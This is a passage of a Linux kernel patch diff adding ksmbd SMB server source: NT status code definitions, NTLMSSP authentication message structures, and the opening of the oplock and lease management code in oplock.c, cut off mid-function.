++#define NT_STATUS_LOST_WRITEBEHIND_DATA (0xC0000000 | 0x0222)
++#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID (0xC0000000 | 0x0223)
++#define NT_STATUS_PASSWORD_MUST_CHANGE (0xC0000000 | 0x0224)
++#define NT_STATUS_NOT_FOUND (0xC0000000 | 0x0225)
++#define NT_STATUS_NOT_TINY_STREAM (0xC0000000 | 0x0226)
++#define NT_STATUS_RECOVERY_FAILURE (0xC0000000 | 0x0227)
++#define NT_STATUS_STACK_OVERFLOW_READ (0xC0000000 | 0x0228)
++#define NT_STATUS_FAIL_CHECK (0xC0000000 | 0x0229)
++#define NT_STATUS_DUPLICATE_OBJECTID (0xC0000000 | 0x022a)
++#define NT_STATUS_OBJECTID_EXISTS (0xC0000000 | 0x022b)
++#define NT_STATUS_CONVERT_TO_LARGE (0xC0000000 | 0x022c)
++#define NT_STATUS_RETRY (0xC0000000 | 0x022d)
++#define NT_STATUS_FOUND_OUT_OF_SCOPE (0xC0000000 | 0x022e)
++#define NT_STATUS_ALLOCATE_BUCKET (0xC0000000 | 0x022f)
++#define NT_STATUS_PROPSET_NOT_FOUND (0xC0000000 | 0x0230)
++#define NT_STATUS_MARSHALL_OVERFLOW (0xC0000000 | 0x0231)
++#define NT_STATUS_INVALID_VARIANT (0xC0000000 | 0x0232)
++#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND (0xC0000000 | 0x0233)
++#define NT_STATUS_ACCOUNT_LOCKED_OUT (0xC0000000 | 0x0234)
++#define NT_STATUS_HANDLE_NOT_CLOSABLE (0xC0000000 | 0x0235)
++#define NT_STATUS_CONNECTION_REFUSED (0xC0000000 | 0x0236)
++#define NT_STATUS_GRACEFUL_DISCONNECT (0xC0000000 | 0x0237)
++#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED (0xC0000000 | 0x0238)
++#define NT_STATUS_ADDRESS_NOT_ASSOCIATED (0xC0000000 | 0x0239)
++#define NT_STATUS_CONNECTION_INVALID (0xC0000000 | 0x023a)
++#define NT_STATUS_CONNECTION_ACTIVE (0xC0000000 | 0x023b)
++#define NT_STATUS_NETWORK_UNREACHABLE (0xC0000000 | 0x023c)
++#define NT_STATUS_HOST_UNREACHABLE (0xC0000000 | 0x023d)
++#define NT_STATUS_PROTOCOL_UNREACHABLE (0xC0000000 | 0x023e)
++#define NT_STATUS_PORT_UNREACHABLE (0xC0000000 | 0x023f)
++#define NT_STATUS_REQUEST_ABORTED (0xC0000000 | 0x0240)
++#define NT_STATUS_CONNECTION_ABORTED (0xC0000000 | 0x0241)
++#define NT_STATUS_BAD_COMPRESSION_BUFFER (0xC0000000 | 0x0242)
++#define NT_STATUS_USER_MAPPED_FILE (0xC0000000 | 0x0243)
++#define NT_STATUS_AUDIT_FAILED (0xC0000000 | 0x0244)
++#define NT_STATUS_TIMER_RESOLUTION_NOT_SET (0xC0000000 | 0x0245)
++#define NT_STATUS_CONNECTION_COUNT_LIMIT (0xC0000000 | 0x0246)
++#define NT_STATUS_LOGIN_TIME_RESTRICTION (0xC0000000 | 0x0247)
++#define NT_STATUS_LOGIN_WKSTA_RESTRICTION (0xC0000000 | 0x0248)
++#define NT_STATUS_IMAGE_MP_UP_MISMATCH (0xC0000000 | 0x0249)
++#define NT_STATUS_INSUFFICIENT_LOGON_INFO (0xC0000000 | 0x0250)
++#define NT_STATUS_BAD_DLL_ENTRYPOINT (0xC0000000 | 0x0251)
++#define NT_STATUS_BAD_SERVICE_ENTRYPOINT (0xC0000000 | 0x0252)
++#define NT_STATUS_LPC_REPLY_LOST (0xC0000000 | 0x0253)
++#define NT_STATUS_IP_ADDRESS_CONFLICT1 (0xC0000000 | 0x0254)
++#define NT_STATUS_IP_ADDRESS_CONFLICT2 (0xC0000000 | 0x0255)
++#define NT_STATUS_REGISTRY_QUOTA_LIMIT (0xC0000000 | 0x0256)
++#define NT_STATUS_PATH_NOT_COVERED (0xC0000000 | 0x0257)
++#define NT_STATUS_NO_CALLBACK_ACTIVE (0xC0000000 | 0x0258)
++#define NT_STATUS_LICENSE_QUOTA_EXCEEDED (0xC0000000 | 0x0259)
++#define NT_STATUS_PWD_TOO_SHORT (0xC0000000 | 0x025a)
++#define NT_STATUS_PWD_TOO_RECENT (0xC0000000 | 0x025b)
++#define NT_STATUS_PWD_HISTORY_CONFLICT (0xC0000000 | 0x025c)
++#define NT_STATUS_PLUGPLAY_NO_DEVICE (0xC0000000 | 0x025e)
++#define NT_STATUS_UNSUPPORTED_COMPRESSION (0xC0000000 | 0x025f)
++#define NT_STATUS_INVALID_HW_PROFILE (0xC0000000 | 0x0260)
++#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH (0xC0000000 | 0x0261)
++#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND (0xC0000000 | 0x0262)
++#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0263)
++#define NT_STATUS_RESOURCE_NOT_OWNED (0xC0000000 | 0x0264)
++#define NT_STATUS_TOO_MANY_LINKS (0xC0000000 | 0x0265)
++#define NT_STATUS_QUOTA_LIST_INCONSISTENT (0xC0000000 | 0x0266)
++#define NT_STATUS_FILE_IS_OFFLINE (0xC0000000 | 0x0267)
++#define NT_STATUS_NETWORK_SESSION_EXPIRED  (0xC0000000 | 0x035c)
++#define NT_STATUS_NO_SUCH_JOB (0xC0000000 | 0xEDE)     /* scheduler */
++#define NT_STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP (0xC0000000 | 0x5D0000)
++#define NT_STATUS_PENDING 0x00000103
++#endif				/* _NTERR_H */
+diff --git a/fs/smb/server/ntlmssp.h b/fs/smb/server/ntlmssp.h
+new file mode 100644
+index 0000000000000..f13153c18b4e9
+--- /dev/null
++++ b/fs/smb/server/ntlmssp.h
+@@ -0,0 +1,169 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2002,2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++#ifndef __KSMBD_NTLMSSP_H
++#define __KSMBD_NTLMSSP_H
++
++#define NTLMSSP_SIGNATURE "NTLMSSP"
++
++/* Security blob target info data */
++#define TGT_Name        "KSMBD"
++
++/*
++ * Size of the crypto key returned on the negotiate SMB in bytes
++ */
++#define CIFS_CRYPTO_KEY_SIZE	(8)
++#define CIFS_KEY_SIZE	(40)
++
++/*
++ * Size of encrypted user password in bytes
++ */
++#define CIFS_ENCPWD_SIZE	(16)
++#define CIFS_CPHTXT_SIZE	(16)
++
++/* Message Types */
++#define NtLmNegotiate     cpu_to_le32(1)
++#define NtLmChallenge     cpu_to_le32(2)
++#define NtLmAuthenticate  cpu_to_le32(3)
++#define UnknownMessage    cpu_to_le32(8)
++
++/* Negotiate Flags */
++#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
++#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
++#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
++/* define reserved9                       0x08 */
++#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
++#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
++#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
++#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
++/* defined reserved 8                   0x0100 */
++#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
++#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
++#define NTLMSSP_ANONYMOUS               0x0800
++#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
++#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
++#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
++#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
++#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
++#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
++#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
++#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
++/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
++#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
++#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
++#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
++#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
++/* #define reserved4                 0x1000000 */
++#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we do not set */
++/* #define reserved3                 0x4000000 */
++/* #define reserved2                 0x8000000 */
++/* #define reserved1                0x10000000 */
++#define NTLMSSP_NEGOTIATE_128       0x20000000
++#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
++#define NTLMSSP_NEGOTIATE_56        0x80000000
++
++/* Define AV Pair Field IDs */
++enum av_field_type {
++	NTLMSSP_AV_EOL = 0,
++	NTLMSSP_AV_NB_COMPUTER_NAME,
++	NTLMSSP_AV_NB_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_COMPUTER_NAME,
++	NTLMSSP_AV_DNS_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_TREE_NAME,
++	NTLMSSP_AV_FLAGS,
++	NTLMSSP_AV_TIMESTAMP,
++	NTLMSSP_AV_RESTRICTION,
++	NTLMSSP_AV_TARGET_NAME,
++	NTLMSSP_AV_CHANNEL_BINDINGS
++};
++
++/* Although typedefs are not commonly used for structure definitions */
++/* in the Linux kernel, in this particular case they are useful      */
++/* to more closely match the standards document for NTLMSSP from     */
++/* OpenGroup and to make the code more closely match the standard in */
++/* appearance */
++
++struct security_buffer {
++	__le16 Length;
++	__le16 MaximumLength;
++	__le32 BufferOffset;	/* offset to buffer */
++} __packed;
++
++struct target_info {
++	__le16 Type;
++	__le16 Length;
++	__u8 Content[];
++} __packed;
++
++struct negotiate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	struct security_buffer DomainName;	/* RFC 1001 style and ASCII */
++	struct security_buffer WorkstationName;	/* RFC 1001 and ASCII */
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++	char DomainString[];
++	/* followed by WorkstationString */
++} __packed;
++
++struct challenge_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;   /* NtLmChallenge = 2 */
++	struct security_buffer TargetName;
++	__le32 NegotiateFlags;
++	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
++	__u8 Reserved[8];
++	struct security_buffer TargetInfoArray;
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++} __packed;
++
++struct authenticate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
++	struct security_buffer LmChallengeResponse;
++	struct security_buffer NtChallengeResponse;
++	struct security_buffer DomainName;
++	struct security_buffer UserName;
++	struct security_buffer WorkstationName;
++	struct security_buffer SessionKey;
++	__le32 NegotiateFlags;
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++	char UserString[];
++} __packed;
++
++struct ntlmv2_resp {
++	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	__le32 blob_signature;
++	__u32  reserved;
++	__le64  time;
++	__u64  client_chal; /* random */
++	__u32  reserved2;
++	/* array of name entries could follow ending in minimum 4 byte struct */
++} __packed;
++
++/* per smb session structure/fields */
++struct ntlmssp_auth {
++	/* whether session key is per smb session */
++	bool		sesskey_per_smbsess;
++	/* sent by client in type 1 ntlmsssp exchange */
++	__u32		client_flags;
++	/* sent by server in type 2 ntlmssp exchange */
++	__u32		conn_flags;
++	/* sent to server */
++	unsigned char	ciphertext[CIFS_CPHTXT_SIZE];
++	/* used by ntlmssp */
++	char		cryptkey[CIFS_CRYPTO_KEY_SIZE];
++};
++#endif /* __KSMBD_NTLMSSP_H */
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+new file mode 100644
+index 0000000000000..4b210cdd75569
+--- /dev/null
++++ b/fs/smb/server/oplock.c
+@@ -0,0 +1,1722 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/moduleparam.h>
++
++#include "glob.h"
++#include "oplock.h"
++
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "mgmt/user_session.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++
++static LIST_HEAD(lease_table_list);
++static DEFINE_RWLOCK(lease_list_lock);
++
++/**
++ * alloc_opinfo() - allocate a new opinfo object for oplock info
++ * @work:	smb work
++ * @id:		fid of open file
++ * @Tid:	tree id of connection
++ *
++ * Return:      allocated opinfo object on success, otherwise NULL
++ */
++static struct oplock_info *alloc_opinfo(struct ksmbd_work *work,
++					u64 id, __u16 Tid)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct oplock_info *opinfo;
++
++	opinfo = kzalloc(sizeof(struct oplock_info), GFP_KERNEL);
++	if (!opinfo)
++		return NULL;
++
++	opinfo->sess = sess;
++	opinfo->conn = conn;
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	opinfo->pending_break = 0;
++	opinfo->fid = id;
++	opinfo->Tid = Tid;
++	INIT_LIST_HEAD(&opinfo->op_entry);
++	INIT_LIST_HEAD(&opinfo->interim_list);
++	init_waitqueue_head(&opinfo->oplock_q);
++	init_waitqueue_head(&opinfo->oplock_brk);
++	atomic_set(&opinfo->refcount, 1);
++	atomic_set(&opinfo->breaking_cnt, 0);
++
++	return opinfo;
++}
++
++static void lease_add_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb = opinfo->o_lease->l_lb;
++
++	spin_lock(&lb->lb_lock);
++	list_add_rcu(&opinfo->lease_entry, &lb->lease_list);
++	spin_unlock(&lb->lb_lock);
++}
++
++static void lease_del_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb = opinfo->o_lease->l_lb;
++
++	if (!lb)
++		return;
++
++	spin_lock(&lb->lb_lock);
++	if (list_empty(&opinfo->lease_entry)) {
++		spin_unlock(&lb->lb_lock);
++		return;
++	}
++
++	list_del_init(&opinfo->lease_entry);
++	opinfo->o_lease->l_lb = NULL;
++	spin_unlock(&lb->lb_lock);
++}
++
++static void lb_add(struct lease_table *lb)
++{
++	write_lock(&lease_list_lock);
++	list_add(&lb->l_entry, &lease_table_list);
++	write_unlock(&lease_list_lock);
++}
++
++static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
++{
++	struct lease *lease;
++
++	lease = kmalloc(sizeof(struct lease), GFP_KERNEL);
++	if (!lease)
++		return -ENOMEM;
++
++	memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	lease->state = lctx->req_state;
++	lease->new_state = 0;
++	lease->flags = lctx->flags;
++	lease->duration = lctx->duration;
++	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
++	lease->version = lctx->version;
++	lease->epoch = 0;
++	INIT_LIST_HEAD(&opinfo->lease_entry);
++	opinfo->o_lease = lease;
++
++	return 0;
++}
++
++static void free_lease(struct oplock_info *opinfo)
++{
++	struct lease *lease;
++
++	lease = opinfo->o_lease;
++	kfree(lease);
++}
++
++static void free_opinfo(struct oplock_info *opinfo)
++{
++	if (opinfo->is_lease)
++		free_lease(opinfo);
++	kfree(opinfo);
++}
++
++static inline void opinfo_free_rcu(struct rcu_head *rcu_head)
++{
++	struct oplock_info *opinfo;
++
++	opinfo = container_of(rcu_head, struct oplock_info, rcu_head);
++	free_opinfo(opinfo);
++}
++
++struct oplock_info *opinfo_get(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
++		opinfo = NULL;
++	rcu_read_unlock();
++
++	return opinfo;
++}
++
++static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
++{
++	struct oplock_info *opinfo;
++
++	if (list_empty(&ci->m_op_list))
++		return NULL;
++
++	rcu_read_lock();
++	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
++					op_entry);
++	if (opinfo) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			opinfo = NULL;
++		else {
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				atomic_dec(&opinfo->refcount);
++				opinfo = NULL;
++			}
++		}
++	}
++
++	rcu_read_unlock();
++
++	return opinfo;
++}
++
++static void opinfo_conn_put(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn;
++
++	if (!opinfo)
++		return;
++
++	conn = opinfo->conn;
++	/*
++	 * Checking waitqueue to dropping pending requests on
++	 * disconnection. waitqueue_active is safe because it
++	 * uses atomic operation for condition.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++	opinfo_put(opinfo);
++}
++
++void opinfo_put(struct oplock_info *opinfo)
++{
++	if (!atomic_dec_and_test(&opinfo->refcount))
++		return;
++
++	call_rcu(&opinfo->rcu_head, opinfo_free_rcu);
++}
++
++static void opinfo_add(struct oplock_info *opinfo)
++{
++	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
++
++	write_lock(&ci->m_lock);
++	list_add_rcu(&opinfo->op_entry, &ci->m_op_list);
++	write_unlock(&ci->m_lock);
++}
++
++static void opinfo_del(struct oplock_info *opinfo)
++{
++	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
++
++	if (opinfo->is_lease) {
++		write_lock(&lease_list_lock);
++		lease_del_list(opinfo);
++		write_unlock(&lease_list_lock);
++	}
++	write_lock(&ci->m_lock);
++	list_del_rcu(&opinfo->op_entry);
++	write_unlock(&ci->m_lock);
++}
++
++static unsigned long opinfo_count(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		return atomic_read(&fp->f_ci->sop_count);
++	else
++		return atomic_read(&fp->f_ci->op_count);
++}
++
++static void opinfo_count_inc(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		return atomic_inc(&fp->f_ci->sop_count);
++	else
++		return atomic_inc(&fp->f_ci->op_count);
++}
++
++static void opinfo_count_dec(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		return atomic_dec(&fp->f_ci->sop_count);
++	else
++		return atomic_dec(&fp->f_ci->op_count);
++}
++
++/**
++ * opinfo_write_to_read() - convert a write oplock to read oplock
++ * @opinfo:		current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_write_to_read(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_II;
++
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * opinfo_read_handle_to_read() - convert a read/handle oplock to read oplock
++ * @opinfo:		current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_read_handle_to_read(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	lease->state = lease->new_state;
++	opinfo->level = SMB2_OPLOCK_LEVEL_II;
++	return 0;
++}
++
++/**
++ * opinfo_write_to_none() - convert a write oplock to none
++ * @opinfo:	current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_write_to_none(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * opinfo_read_to_none() - convert a write read to none
++ * @opinfo:	current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_read_to_none(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (opinfo->level != SMB2_OPLOCK_LEVEL_II) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * lease_read_to_write() - upgrade lease state from read to write
++ * @opinfo:	current lease info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int lease_read_to_write(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(lease->state & SMB2_LEASE_READ_CACHING_LE)) {
++		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++
++	lease->new_state = SMB2_LEASE_NONE_LE;
++	lease->state |= SMB2_LEASE_WRITE_CACHING_LE;
++	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++		opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
++	else
++		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	return 0;
++}
++
++/**
++ * lease_none_upgrade() - upgrade lease state from none
++ * @opinfo:	current lease info
++ * @new_state:	new lease state
++ *
++ * Return:	0 on success, otherwise -EINVAL
++ */
++static int lease_none_upgrade(struct oplock_info *opinfo, __le32 new_state)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(lease->state == SMB2_LEASE_NONE_LE)) {
++		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++
++	lease->new_state = SMB2_LEASE_NONE_LE;
++	lease->state = new_state;
++	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++			opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
++		else
++			opinfo->level = SMB2_OPLOCK_LEVEL_II;
++	else if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	else if (lease->state & SMB2_LEASE_READ_CACHING_LE)
++		opinfo->level = SMB2_OPLOCK_LEVEL_II;
++
++	return 0;
++}
++
++/**
++ * close_id_del_oplock() - release oplock object at file close time
++ * @fp:		ksmbd file pointer
++ */
++void close_id_del_oplock(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++
++	if (S_ISDIR(file_inode(fp->filp)->i_mode))
++		return;
++
++	opinfo = opinfo_get(fp);
++	if (!opinfo)
++		return;
++
++	opinfo_del(opinfo);
++
++	rcu_assign_pointer(fp->f_opinfo, NULL);
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		opinfo->op_state = OPLOCK_CLOSING;
++		wake_up_interruptible_all(&opinfo->oplock_q);
++		if (opinfo->is_lease) {
++			atomic_set(&opinfo->breaking_cnt, 0);
++			wake_up_interruptible_all(&opinfo->oplock_brk);
++		}
++	}
++
++	opinfo_count_dec(fp);
++	atomic_dec(&opinfo->refcount);
++	opinfo_put(opinfo);
++}
++
++/**
++ * grant_write_oplock() - grant exclusive/batch oplock or write lease
++ * @opinfo_new:	new oplock info object
++ * @req_oplock: request oplock
++ * @lctx:	lease context information
++ *
++ * Return:      0
++ */
++static void grant_write_oplock(struct oplock_info *opinfo_new, int req_oplock,
++			       struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	if (req_oplock == SMB2_OPLOCK_LEVEL_BATCH)
++		opinfo_new->level = SMB2_OPLOCK_LEVEL_BATCH;
++	else
++		opinfo_new->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++
++	if (lctx) {
++		lease->state = lctx->req_state;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++/**
++ * grant_read_oplock() - grant level2 oplock or read lease
++ * @opinfo_new:	new oplock info object
++ * @lctx:	lease context information
++ *
++ * Return:      0
++ */
++static void grant_read_oplock(struct oplock_info *opinfo_new,
++			      struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	opinfo_new->level = SMB2_OPLOCK_LEVEL_II;
++
++	if (lctx) {
++		lease->state = SMB2_LEASE_READ_CACHING_LE;
++		if (lctx->req_state & SMB2_LEASE_HANDLE_CACHING_LE)
++			lease->state |= SMB2_LEASE_HANDLE_CACHING_LE;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++/**
++ * grant_none_oplock() - grant none oplock or none lease
++ * @opinfo_new:	new oplock info object
++ * @lctx:	lease context information
++ *
++ * Return:      0
++ */
++static void grant_none_oplock(struct oplock_info *opinfo_new,
++			      struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	opinfo_new->level = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (lctx) {
++		lease->state = 0;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++static inline int compare_guid_key(struct oplock_info *opinfo,
++				   const char *guid1, const char *key1)
++{
++	const char *guid2, *key2;
++
++	guid2 = opinfo->conn->ClientGUID;
++	key2 = opinfo->o_lease->lease_key;
++	if (!memcmp(guid1, guid2, SMB2_CLIENT_GUID_SIZE) &&
++	    !memcmp(key1, key2, SMB2_LEASE_KEY_SIZE))
++		return 1;
++
++	return 0;
++}
++
++/**
++ * same_client_has_lease() - check whether current lease request is
++ *		from lease owner of file
++ * @ci:		master file pointer
++ * @client_guid:	Client GUID
++ * @lctx:		lease context information
++ *
++ * Return:      oplock(lease) object on success, otherwise NULL
++ */
++static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
++						 char *client_guid,
++						 struct lease_ctx_info *lctx)
++{
++	int ret;
++	struct lease *lease;
++	struct oplock_info *opinfo;
++	struct oplock_info *m_opinfo = NULL;
++
++	if (!lctx)
++		return NULL;
++
++	/*
++	 * Compare lease key and client_guid to know request from same owner
++	 * of same client
++	 */
++	read_lock(&ci->m_lock);
++	list_for_each_entry(opinfo, &ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++		read_unlock(&ci->m_lock);
++		lease = opinfo->o_lease;
++
++		ret = compare_guid_key(opinfo, client_guid, lctx->lease_key);
++		if (ret) {
++			m_opinfo = opinfo;
++			/* skip upgrading lease about breaking lease */
++			if (atomic_read(&opinfo->breaking_cnt)) {
++				read_lock(&ci->m_lock);
++				continue;
++			}
++
++			/* upgrading lease */
++			if ((atomic_read(&ci->op_count) +
++			     atomic_read(&ci->sop_count)) == 1) {
++				if (lease->state ==
++				    (lctx->req_state & lease->state)) {
++					lease->state |= lctx->req_state;
++					if (lctx->req_state &
++						SMB2_LEASE_WRITE_CACHING_LE)
++						lease_read_to_write(opinfo);
++				}
++			} else if ((atomic_read(&ci->op_count) +
++				    atomic_read(&ci->sop_count)) > 1) {
++				if (lctx->req_state ==
++				    (SMB2_LEASE_READ_CACHING_LE |
++				     SMB2_LEASE_HANDLE_CACHING_LE))
++					lease->state = lctx->req_state;
++			}
++
++			if (lctx->req_state && lease->state ==
++			    SMB2_LEASE_NONE_LE)
++				lease_none_upgrade(opinfo, lctx->req_state);
++		}
++		read_lock(&ci->m_lock);
++	}
++	read_unlock(&ci->m_lock);
++
++	return m_opinfo;
++}
++
++static void wait_for_break_ack(struct oplock_info *opinfo)
++{
++	int rc = 0;
++
++	rc = wait_event_interruptible_timeout(opinfo->oplock_q,
++					      opinfo->op_state == OPLOCK_STATE_NONE ||
++					      opinfo->op_state == OPLOCK_CLOSING,
++					      OPLOCK_WAIT_TIME);
++
++	/* is this a timeout ? */
++	if (!rc) {
++		if (opinfo->is_lease)
++			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
++		opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++		opinfo->op_state = OPLOCK_STATE_NONE;
++	}
++}
++
++static void wake_up_oplock_break(struct oplock_info *opinfo)
++{
++	clear_bit_unlock(0, &opinfo->pending_break);
++	/* memory barrier is needed for wake_up_bit() */
++	smp_mb__after_atomic();
++	wake_up_bit(&opinfo->pending_break, 0);
++}
++
++static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
++{
++	while (test_and_set_bit(0, &opinfo->pending_break)) {
